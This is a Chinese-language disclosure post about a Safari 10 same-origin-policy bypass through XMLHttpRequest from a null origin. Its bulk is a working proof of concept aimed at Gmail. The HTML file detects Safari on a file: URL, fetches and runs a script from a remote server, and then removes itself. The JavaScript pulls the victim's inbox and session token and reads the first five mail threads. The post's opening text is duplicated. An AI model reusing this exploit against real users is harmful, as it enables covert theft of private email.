safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置http_header 我交到苹果的bugreport,并给apple发邮件后,他们自己悄悄把漏洞修了,连个邮件都没给我发,所以我决定公开poc 这是我在漏洞未修复前截的图:      这个漏洞可以造成同源策略绕过,随便跨域,这是我写的获取gmail数据的代码: ```html <script id='jquery' src='http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js'></script> <script id='test'> var server_address = 'http://127.0.0.1:8000/static/csrf_Wcn6h/' function deleteSelf(){ let test = document.getElementById('test'); test.parentNode.removeChild(test); } function getPoc(src,id){//src:poc地址id:append的<script>的id,用于移除改元素 let head =...
safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置http_header 我交到苹果的bugreport,并给apple发邮件后,他们自己悄悄把漏洞修了,连个邮件都没给我发,所以我决定公开poc 这是我在漏洞未修复前截的图:      这个漏洞可以造成同源策略绕过,随便跨域,这是我写的获取gmail数据的代码: ```html <script id='jquery' src='http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js'></script> <script id='test'> var server_address = 'http://127.0.0.1:8000/static/csrf_Wcn6h/' function deleteSelf(){ let test = document.getElementById('test'); test.parentNode.removeChild(test); } function getPoc(src,id){//src:poc地址id:append的<script>的id,用于移除改元素 let head = document.getElementsByTagName('HEAD').item(0); script = document.createElement("script"); script.type = "text/javascript"; script.src = src; script.id = id; head.appendChild(script); let test = document.getElementById(id); test.parentNode.removeChild(test); } if('file:' == document.location.protocol && navigator.userAgent.toLowerCase().indexOf("safari")>-1 && navigator.userAgent.toLowerCase().indexOf("chrome")<0){ getPoc(server_address+"get_gmail.js","get_gmail"); deleteSelf(); } else{ deleteSelf(); } </script> ``` ```javascript function send_to_server(data_sender){ localStorage.setItem((++num).toString(),data_sender.responseText); } let num = 0; let mail_list; let ik; let t = $.ajax({ type: 'get', url: "https://mail.google.com/", //data: data, headers:{'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'zh-CN,zh;q=0.8,en;q=0.6', 'Host':'mail.google.com' }, success: function(event,xhr,settings){ mail_list = t.responseText.match(/var\sVIEW_DATA=(.*);\svar\sGM_TIMING_END_CHUNK2/)[1]; ik = t.responseText.match(/(.*)var\sGLOBALS=\[(.*?),(.*?),\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",(.*?),\"(.*?)\"(.*)/)[11]; if(mail_list != null){ mail_list = eval(mail_list)[3][2]; console.log(mail_list); for(let i = 0;i < 5;i++){ let th = mail_list[i][0]; let data_sender = $.ajax({ type:'post', data:'', url:'https://mail.google.com/mail/?ik='+ik+'&view=cv&th='+th+'&prf=1&search=inbox', headers:{ 'Host': 'mail.google.com', 'Connection': 'close', 'Content-Length': '0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 'Accept': '*\/*', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6', 'X-Same-Domain': '1', 'Origin': 'https://mail.google.com', 'X-Chrome-UMA-Enabled': '1', }, success:function(event,xhr,settings){ send_to_server(data_sender); } }); } //*/ } else{ console.log('get mail_list error'); } } }); ```
